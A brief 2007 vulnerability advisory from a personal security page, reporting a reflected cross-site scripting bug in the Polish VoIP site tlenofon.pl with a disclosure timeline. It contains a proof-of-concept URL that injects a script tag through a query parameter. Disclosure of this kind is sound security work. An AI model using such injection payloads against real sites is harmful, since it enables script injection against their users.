kanedaaa... ... borys ... bohater ...
slackware - pakiety faqsecuritypublicartprocessinglinux mojetestslinkistatsstart
kaneda@bohater.net
+ Subject:
XSS bug for www.tlenofon.pl

+ Version:
2007.03.04

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ tlenofon.pl Description:
www.tlenofon.pl is "voip application service", a part of o2.pl the most famous Polish web portal.

+ Description:
XSS IN:
http://www.tlenofon.pl/index.php?dzial=faq&nr_kat=1&nam_kat=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3EWymagania%20techniczne,%20jak%20zacz%B1%E6%20i%20problemy%20z%20logowaniem

Its nothing special, because this site is without any kind of authentication.



Timeline:
2007.03.04 bug discovered
2007.03.04 bug sent via mail from http://kontakt.o2.pl
2007.03.15 response from kontakt.o2.pl - promise about fix and...
2007.03.30 still not fixed

Original Advisory: http://kaneda.bohater.net/security/20070304-xss-tlenofon.pl.php

Check my other bugs in security section: Security